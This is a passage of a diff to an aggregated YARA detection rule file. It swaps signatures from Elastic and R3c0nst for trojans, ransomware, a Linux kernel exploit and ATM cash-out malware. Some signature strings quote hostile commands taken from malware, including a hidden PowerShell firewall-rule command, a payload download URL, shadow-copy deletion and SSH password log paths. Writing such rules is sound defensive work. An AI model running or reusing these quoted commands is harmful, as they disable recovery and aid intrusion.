"ef9a92f2ed29f508dca591e9c65a6ce0013ccdfd0c62770e8840be2f3ee5982e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_EICAR.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "05c92058aab1229dfa31e006276c2c83fa484e813bdfe66edf387763797d9d57" score = 75 - quality = 73 + quality = 25 tags = "FILE, MEMORY" - fingerprint = "a7eb084004fce79efc39781044bad501a731163fa3ad6f9b8b334611d03f5379" - severity = 100 - arch_context = "x86" + fingerprint = "bb0e0bdf70ec65d98f652e2428e3567013d5413f2725a2905b372fd18da8b9dd" + severity = 1 + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $guid = "F1DF1D0F-FF86-4106-97A8-F95AAF525C54" ascii wide nocase - $print_str0 = "[+] Another user is logged on, asking to take over session" ascii wide fullword - $print_str1 = "[+] Execution priv type : {0}" ascii wide fullword - $print_str2 = "[+] Sleeping for 30 seconds" ascii wide fullword - $print_str3 = "[X] Error: A password is required" ascii wide fullword + $a = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" ascii fullword condition: - $guid or all of ($print_str*) + all of them } -rule ELASTIC_Windows_Trojan_Masslogger_511B001E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Kronos_Cdd2E2C5 : FILE MEMORY { meta: - description = "Detects Windows Trojan Masslogger (Windows.Trojan.MassLogger)" + description = "Strings used by the Kronos banking trojan and variants." author = "Elastic Security" - id = "511b001e-dc67-4e45-9096-0b01101ca0ab" - date = "2022-03-02" - modified = "2022-04-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_MassLogger.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "177875c756a494872c516000beb6011cec22bd9a73e58ba6b2371dba2ab8c337" - logic_hash = "5abac5e32e55467710842e19c25cab5c7f1cdb0f8a68fb6808d54467c69ebdf6" + id = "cdd2e2c5-17fc-4cec-aece-0b19c54faccf" + date = "2021-02-07" + modified = "2021-08-23" + reference = "https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Kronos.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "baa9cedbbe0f5689be8f8028a6537c39e9ea8b0815ad76cb98f365ca5a41653f" + logic_hash = "a8943c5ef166446629cb46517d35db39c97a1e3efa3a7a0b5cb3d3ee9d1e6e9c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "14ec9c32af7c1dd4a1f73e37ef9e042c18d9e0179b0e5732752767f93be6d4e2" + fingerprint = "0e124d42a6741a095b66928303731e7060788bc1035b98b729ca91e4f7b6bc44" + threat_name = "Windows.Trojan.Kronos" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110705,33 +111075,34 @@ rule ELASTIC_Windows_Trojan_Masslogger_511B001E : FILE MEMORY os = "windows" strings: - $a1 = "ExecutionPolicy Bypass -WindowStyle Hidden -Command netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protoc" wide - $a2 = "https://raw.githubusercontent.com/lisence-system/assemply/main/VMprotectEncrypt.jpg" wide fullword - $a3 = "ECHO $SMTPServer = smtp.gmail.com >> %PSScript%" wide fullword - $a4 = "Injecting Default Template...." wide fullword - $a5 = "GetVncLoginMethodAsync" ascii fullword - $a6 = "/c start computerdefaults.exe" wide fullword + $a1 = "data_inject" ascii wide fullword + $a2 = "set_filter" ascii wide fullword + $a3 = "set_url" ascii wide fullword + $a4 = "%ws\\%ws.cfg" ascii wide fullword + $a5 = "D7T1H5F0F5A4C6S3" ascii wide fullword + $a6 = "[DELETE]" ascii wide fullword + $a7 = "Kronos" ascii wide fullword condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Orbit_57C23178 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2009_2698_12374E97 : FILE MEMORY CVE_2009_2698 { meta: - description = "Detects Linux Trojan Orbit (Linux.Trojan.Orbit)" + description = "Detects Linux Exploit Cve 2009 2698 (Linux.Exploit.CVE-2009-2698)" author = "Elastic Security" - id = "57c23178-1345-47b7-97b1-aa2075d9d69d" - date = "2022-07-20" - modified = "2022-08-16" + id = "12374e97-385e-4b3a-9d50-39f35ad4f6dd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Orbit.yar#L1-L40" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020" - logic_hash = "25b29e874ea9d400662418ddbb1c995a5a5b49f8ba6f51f59f7aa57cdda74054" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2009_2698.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "656fddc1bf4743a08a455628b6151076b81e604ff49c93d797fa49b1f7d09c2f" + logic_hash = "ed86a239b909681f2ab3503cfedf202dbe5f53a6f554cf4db13f08bee625c0b7" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "0bb1c74f872ea8778a442aafc2c6f3f04e331b7f743ba726257e36b09ef33da4" + quality = 75 + tags = "FILE, MEMORY, CVE-2009-2698" + fingerprint = "2c669220ac8909e2336bbf9c38489c8e32d573ab6c29fa1e2e0c1fe69f7441ed" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110739,89 +111110,65 @@ rule ELASTIC_Linux_Trojan_Orbit_57C23178 : FILE MEMORY os = "linux" strings: - $loaderstrings0 = "shred" - $loaderstrings1 = "newpath" fullword - $loaderstrings2 = "shm update" fullword - $loaderstrings3 = "cp -p %s /dev/shm/ldx/.backup_ld.so" fullword - $loaderstrings4 = "/dev/shm/ldx/libdl.so\n" fullword - $loaderstrings5 = "oldpath: %s newpath: %s\n" fullword - $loaderstrings6 = "can't locate oldpath" fullword - $loaderstrings7 = "specify dir" fullword - $loaderstrings8 = "/sshpass.txt" - $loaderstrings9 = "/sshpass2.txt" - $loaderstrings10 = "/.logpam" - $loaderstrings11 = "/.boot.sh" - $tmppath = "/tmp/.orbit" fullword - $functionName0 = "tcp_port_hidden" fullword - $functionName1 = "clean_ports" fullword - $functionName2 = "remove_port" fullword - $execvStrings0 = "[%s] [%s] [BLOCKED] %s " fullword - $execvStrings1 = "[%s] [%s] %s " fullword - $execvStrings2 = "%m-%d %H:%M:%S" fullword - $pam_log_password = { 8B 45 F8 48 98 C6 84 05 F0 FE FF FF 00 48 8D 85 F0 FE FF FF B9 A4 01 00 00 BA 42 04 00 00 48 89 C6 BF 02 00 00 00 B8 00 00 00 00 E8 B6 C2 FE FF 89 45 F4 48 8B 8D E0 FE FF FF 48 8B 95 E8 FE FF FF 48 8D 85 F0 FE FF FF } - $load_hidden_ports = { 48 8B 45 ?? BE 0A 00 00 00 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 } - $hosts_access = { 8B 45 ?? 48 98 C6 84 05 D0 EF FF FF 00 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? 00 00 48 8B 95 C8 EF FF FF 48 89 D7 FF D0 89 45 ?? 48 8D 85 D0 EF FF FF 48 89 45 ?? EB } + $a = { 74 64 6F 75 74 00 66 77 72 69 74 65 00 64 65 73 63 00 63 76 65 00 } condition: - 7 of ($loaderstrings*) or ( all of ($functionName*) and $tmppath and all of ($execvStrings*)) or 2 of ($pam_log_password,$load_hidden_ports,$hosts_access) + all of them } -rule ELASTIC_Windows_Trojan_Babylonrat_0F66E73B : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2009_2698_Cc04Dddd : FILE MEMORY CVE_2009_2698 { meta: - description = "Detects Windows Trojan Babylonrat (Windows.Trojan.Babylonrat)" + description = "Detects Linux Exploit Cve 2009 2698 (Linux.Exploit.CVE-2009-2698)" author = "Elastic Security" - id = "0f66e73b-7824-46b6-a9e6-5abf018c9ffa" - date = "2021-09-02" - modified = "2022-01-13" + id = "cc04dddd-91d0-4c5f-a0ac-01787da7f369" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Babylonrat.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4278064ec50f87bb0471053c068b13955ed9d599434e687a64bf2060438a7511" - logic_hash = "66223dc9e2ef7330e26c91f0c82c555e96e4c794a637ab2cbe36410f3eca202a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2009_2698.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "502b73ea04095e8a7ec4e8d7cc306242b45850ad28690156754beac8cd8d7b2d" + logic_hash = "68daa56ca98cc8f713faa138432190d19c27f07b2182a1f82347a3bfc5821ebb" score = 75 - quality = 50 - tags = "FILE, MEMORY" - fingerprint = "3998824e381f51aaa2c81c12d4c05157c642d8aef39982e35fa3e124191640ea" + quality = 75 + tags = "FILE, MEMORY, CVE-2009-2698" + fingerprint = "d3fdd66e486cb06bd63f6d8e471e66bc80990c4f0729eea16b47adc4cac80538" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "BabylonRAT" wide fullword - $a2 = "Babylon RAT Client" wide fullword - $a3 = "ping 0 & del \"" wide fullword - $a4 = "\\%Y %m %d - %I %M %p" wide fullword + $a = { C4 10 89 45 F4 83 7D F4 FF 75 1F 83 EC 0C 68 } condition: all of them } -rule ELASTIC_Linux_Trojan_Azeela_Aad9D6Cc : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Conti_89F3F6Fa : FILE MEMORY { meta: - description = "Detects Linux Trojan Azeela (Linux.Trojan.Azeela)" + description = "Detects Windows Ransomware Conti (Windows.Ransomware.Conti)" author = "Elastic Security" - id = "aad9d6cc-32ff-431a-9914-01c7adc80877" - date = "2021-01-12" - modified = "2021-09-16" + id = "89f3f6fa-492c-40e3-a4aa-a526004197b2" + date = "2021-08-05" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Azeela.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6c476a7457ae07eca3d3d19eda6bb6b6b3fa61fa72722958b5a77caff899aaa6" - logic_hash = "efc8b5de42a2ee2104dc8e8c25b313f6ced2fb291ba27dc8276822960dd7eb74" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Conti.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe" + logic_hash = "4c1834e45d5e42f466249b75a89561ce1e88b9e3c07070e2833d4897fbed22ee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3b7c73a378157350344d52acd6c210d5924cf55081b386d0d60345e4c44c5921" + fingerprint = "a82331eba3cbd52deb4bed5e11035ac1e519ec27931507f582f2985865c0fb1a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C0 74 07 B8 01 00 00 00 EB 31 48 8B 45 F8 0F B6 00 3C FF 74 21 48 83 45 } + $a = { F7 FE 88 57 FF 83 EB 01 75 DA 8B 45 FC 5F 5B 40 5E 8B E5 5D C3 8D } condition: all of them @@ -110830,7 +111177,7 @@ rule ELASTIC_Linux_Trojan_Azeela_Aad9D6Cc : FILE MEMORY * YARA Rule Set * Repository Name: R3c0nst * Repository: https://github.com/fboldewin/YARA-rules/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 54e9e6899b258b72074b2b4db6909257683240c2 * Number of Rules: 26 * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance) @@ -110840,31 +111187,35 @@ rule ELASTIC_Linux_Trojan_Azeela_Aad9D6Cc : FILE MEMORY * * NO LICENSE SET */ -rule R3C0NST_Gamaredon_Getimportbyhash : FILE +rule R3C0NST_ATM_Malware_Dispcashbr : FILE { meta: - description = "Detects Gamaredon APIHashing" + description = "Detects ATM Malware DispCashBR" author = "Frank Boldewin (@r3c0nst)" - id = "8f28273e-e8ca-52cb-8dbc-a235598b1975" - date = "2021-05-12" - modified = "2021-05-12" - reference = "https://github.com/fboldewin/YARA-rules/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16" + id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c" + date = "2020-02-27" + modified = "2020-08-17" + reference = "https://twitter.com/r3c0nst/status/1232944566208286720" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21" license_url = "N/A" - logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162" + logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d" score = 75 quality = 90 tags = "FILE" - hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79" - hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8" - hash3 = "5c09f6ebb7243994ddc466058d5dc9920a5fced5e843200b1f057bda087b8ba6" + hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036" strings: - $ParseImgExportDir = { 8B 50 3C 03 D0 8B 52 78 03 D0 8B 4A 1C 03 C8 } - $djb2Hashing = { 8B 75 08 BA 05 15 00 00 8B C2 C1 E2 05 03 D0 33 DB 8A 1E 03 D3 46 33 DB 8A 1E 85 DB 75 } + $String1 = "(*) Dispensando: %lu" ascii nocase + $String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase + $String3 = "[+] FOI SACADO: %lu R$ [+]" ascii nocase + $DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase + $DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase + $Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8} + $Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8} + $Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8} condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5A4D and filesize <100KB and 2 of ($String*) and 1 of ($DbgStr*) and all of ($Code*) } rule R3C0NST_ATM_Malware_Loup : FILE { @@ -110891,56 +111242,89 @@ rule R3C0NST_ATM_Malware_Loup : FILE condition: uint16(0)==0x5A4D and filesize <100KB and all of ($String*) and $Code } -import "pe" +rule R3C0NST_Aplib_Decompression : FILE +{ + meta: + description = "Detects aPLib decompression code often used in malware" + author = "@r3c0nst" + id = "f45c73f5-d316-5fea-a8c4-fd930733415f" + date = "2021-03-24" + modified = "2021-03-25" + reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16" + license_url = "N/A" + logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4" + score = 75 + quality = 90 + tags = "FILE" -rule R3C0NST_ATM_Malware_ATMITCH : FILE + strings: + $pattern1 = { FC B2 80 31 DB A4 B3 02 } + $pattern2 = { AC D1 E8 74 ?? 11 C9 EB } + $pattern3 = { 73 0A 80 FC 05 73 ?? 83 F8 7F 77 } + + condition: + filesize <10MB and all of them +} +rule R3C0NST_Ransomware_Germanwiper : FILE { meta: - description = "Detects ATM Malware ATMItch" + description = "Detects RansomWare GermanWiper in Memory or in unpacked state" author = "Frank Boldewin (@r3c0nst)" - id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8" - date = "2019-03-18" - modified = "2019-03-18" - reference = "https://github.com/fboldewin/YARA-rules/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14" + id = "ea71849e-62a1-5b4d-9cf7-0728192361cc" + date = "2019-08-05" + modified = "2019-08-05" + reference = "https://twitter.com/r3c0nst/status/1158326526766657538" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Ransomware.Germanwiper.yar#L1-L25" license_url = "N/A" - logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4" + logic_hash = "563ad59abd09d9a5fcfcf5ed48dc1e3c48b4bb198c20721d5af531da20d2b0d3" score = 75 - quality = 82 + quality = 90 tags = "FILE" + hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c" + hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447" strings: - $STRING1 = "SCREEN and think what does you DO" nocase ascii wide - $STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide - $STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide - $STRING4 = "Catch some money, bitch!" nocase ascii wide + $PurgeCode = {6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8} + $Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" nocase ascii + $Mutex2 = "cFgxTERNWEVhM2V" nocase ascii + $ProcessKill1 = "oracle.exe" nocase ascii + $ProcessKill2 = "sqbcoreservice.exe" nocase ascii + $ProcessKill3 = "isqlplussvc.exe" nocase ascii + $ProcessKill4 = "mysqld.exe" nocase ascii + $KillShadowCopies = "vssadmin.exe delete shadows" nocase ascii + $Domain1 = "cdnjs.cloudflare.com" nocase ascii + $Domain2 = "expandingdelegation.top" nocase ascii + $RansomNote = "Entschluesselungs_Anleitung.html" nocase ascii condition: - ( uint16(0)==0x5A4D and 1 of them ) or (pe.imphash()=="655ad5439db0832c5a3f86d0a68ddaac") + uint16(0)==0x5A4D and filesize <1000KB and 5 of them } -rule R3C0NST_Stealbit : FILE +import "hash" + +rule R3C0NST_ATM_Malware_Atmspitter : FILE { meta: - description = "Detects Stealbit used by Lockbit 2.0 Ransomware Gang" + description = "Detects ATM Malware ATMSpitter" author = "Frank Boldewin (@r3c0nst)" - id = "07b466cb-92b3-51f2-a702-2930bb7038c6" - date = "2021-08-12" - modified = "2021-08-12" - reference = "https://raw.githubusercontent.com/fboldewin/YARA-rules/master/Lockbit2.Stealbit.yar" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Lockbit2.Stealbit.yar#L1-L15" + id = "4497f304-6f04-5f5d-91ba-9124e5262078" + date = "2016-07-20" + modified = "2019-03-29" + reference = "https://topics.amcham.com.tw/2017/02/looking-back-at-the-first-banks-atm-heist/" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMSpitter.yar#L3-L21" license_url = "N/A" - logic_hash = "e5f770cc5887f09af0c5550073d51b9e5ffa9dcfa4db6b77bb28643f0f6224fb" + hash = "658b0502b53f718bd0611a638dfd5969" + logic_hash = "684820ed29c50a41bd262862cb97c70c0cbb8554e7e4be300986519423249c50" score = 75 - quality = 90 + quality = 65 tags = "FILE" - hash1 = "3407f26b3d69f1dfce76782fee1256274cf92f744c65aa1ff2d3eaaaf61b0b1d" - hash2 = "bd14872dd9fdead89fc074fdc5832caea4ceac02983ec41f814278130b3f943e" strings: - $C2Decryption = {33 C9 8B C1 83 E0 0F 8A 80 ?? ?? ?? ?? 30 81 ?? ?? ?? ?? 41 83 F9 7C 72 E9 E8} + $Code_Bytes = { B9 E0 07 00 00 66 ?? ?? ?? ?? 0F 85 DD 02 00 00 66 ?? ?? ?? ?? ?? 0F 85 D1 02 00 00 } + $Service = "Congratulations! You are very skilled in reverse engineering!" nocase ascii condition: - uint16(0)==0x5A4D and filesize <100KB and $C2Decryption + (hash.sha256(0, filesize )=="4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958") or ($Code_Bytes and $Service) } import "hash" @@ -110969,168 +111353,31 @@ rule R3C0NST_ATM_Malware_NVISOSPIT : FILE condition: uint16(0)==0x5A4D and filesize <100KB and 2 of them } -rule R3C0NST_Shellcode_Apihashing_FIN8 -{ - meta: - description = "Detects FIN8 Shellcode APIHashing" - author = "Frank Boldewin (@r3c0nst)" - id = "a5b4a925-c4cc-5d3a-a2f1-3372f77ceea2" - date = "2021-03-16" - modified = "2021-03-25" - reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Shellcode.APIHashing.FIN8.yar#L1-L74" - license_url = "N/A" - logic_hash = "958d6a3c0c78ad22fb56896d6a97b9fe79c56813dc36a37385f3ce5621008624" - score = 75 - quality = 90 - tags = "" - - strings: - $APIHashing32bit1 = {68 F2 55 03 88 68 65 19 6D 1E} - $APIHashing32bit2 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4} - $APIHashing64bit = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21} - - condition: - all of ($APIHashing32bit*) or $APIHashing64bit -} -rule R3C0NST_ATM_Malware_Xfscashncr : FILE +rule R3C0NST_Gamaredon_Getimportbyhash : FILE { meta: - description = "Detects ATM Malware XFSCashNCR" + description = "Detects Gamaredon APIHashing" author = "Frank Boldewin (@r3c0nst)" - id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4" - date = "2019-08-28" - modified = "2019-08-28" - reference = "https://twitter.com/r3c0nst/status/1166773324548063232" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21" - license_url = "N/A" - logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a" - score = 75 - quality = 90 - tags = "FILE" - hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0" - - strings: - $Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8} - $Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8} - $StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii - $StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii - $StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii - $StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii - $PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii - $LogFile = "XfsLog.txt" nocase ascii - - condition: - uint16(0)==0x5A4D and filesize <1500KB and 4 of them -} -import "hash" - -rule R3C0NST_ATM_Malware_Dispenserxfs : FILE -{ - meta: - description = "No description has been set in the source file - R3c0nst" - author = "Frank Boldewin" - id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269" - date = "2019-02-28" - modified = "2019-02-28" + id = "8f28273e-e8ca-52cb-8dbc-a235598b1975" + date = "2021-05-12" + modified = "2021-05-12" reference = "https://github.com/fboldewin/YARA-rules/" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13" - license_url = "N/A" - logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f" - score = 75 - quality = 59 - tags = "FILE" - - strings: - $Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 } - $XFSKILL = "injected mxsfs killer into" nocase ascii wide - $PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide - - condition: - (hash.sha256(0, filesize )=="867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a") or ( uint16(0)==0x5A4D and 1 of them ) -} -import "pe" - -rule R3C0NST_ATM_Malware_Ploutusi : FILE -{ - meta: - description = "Detects Ploutus I .NET samples based on MetabaseQ report" - author = "Frank Boldewin (@r3c0nst)" - id = "02104112-6f81-5d19-935d-45cfcd2fa41c" - date = "2021-03-03" - modified = "2021-03-04" - reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26" - license_url = "N/A" - logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4" - score = 75 - quality = 90 - tags = "FILE" - hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1" - hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31" - hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a" - hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c" - - strings: - $Code = {28 ?? 02 00 06 2a} - - condition: - filesize <300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports("mscoree.dll","_CorExeMain") and ( for any i in (0..pe.number_of_resources-1) : (pe.resources[i].type==pe.RESOURCE_TYPE_VERSION and (pe.version_info["InternalName"] contains "Diebold.exe"))) -} -rule R3C0NST_ATM_Malware_XFS_ALICE : FILE -{ - meta: - description = "Detects ATM Malware ALICE" - author = "Frank Boldewin (@r3c0nst)" - id = "6132730c-4684-517a-b90d-98ed250e2cba" - date = "2020-01-09" - modified = "2020-08-17" - reference = "https://twitter.com/r3c0nst/status/1215265889844637696" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ALICE.yar#L1-L22" - license_url = "N/A" - logic_hash = "7dca049f024f09c2e778b0693a1015d1fc5a006fc564de914e85231cb5d73da3" - score = 75 - quality = 90 - tags = "FILE" - hash1 = "6b2fac8331e4b3e108aa829b297347f686ade233b24d94d881dc4eff81b9eb30" - - strings: - $String1 = "Project Alice" ascii nocase - $String2 = "Can't dispense requested amount." ascii nocase - $String3 = "Selected cassette is unavailable" ascii nocase - $String4 = "ATM update manager" wide nocase - $String5 = "Input PIN-code for access" wide nocase - $String6 = "Supervisor ID" wide nocase - $Code1 = {50 68 08 07 00 00 6A 00 FF 75 0C FF 75 08 E8} - $Code2 = {50 6A 00 FF 75 10 FF 75 0C FF 75 08 E8} - $Code3 = {68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 0B C0 75 29 6A} - - condition: - uint16(0)==0x5A4D and filesize <200KB and 4 of ($String*) and all of ($Code*) -} -rule R3C0NST_Aplib_Decompression : FILE -{ - meta: - description = "Detects aPLib decompression code often used in malware" - author = "@r3c0nst" - id = "f45c73f5-d316-5fea-a8c4-fd930733415f" - date = "2021-03-24" - modified = "2021-03-25" - reference = "https://ibsensoftware.com/files/aPLib-1.1.1.zip" - source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/aPLib_decompression.yar#L1-L16" + source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/APT.Gamaredon.GetImportByHash.yar#L1-L16" license_url = "N/A" - logic_hash = "1150701724fdb487ebe8fb959afd12fff37a8e9137cb94e78e976a2566ec5fa4" + logic_hash = "b3baebfb745ebc7b9e6df746bfa9622f925b8e8130932e44a148881e7d1fc162" score = 75 quality = 90 tags = "FILE" + hash1 = "2d03a301bae0e95a355acd464afc77fde88dd00232aad6c8580b365f97f67a79" + hash2 = "43d6e56515cca476f7279c3f276bf848da4bc13fd15fad9663b9e044970253e8" + hash3 = 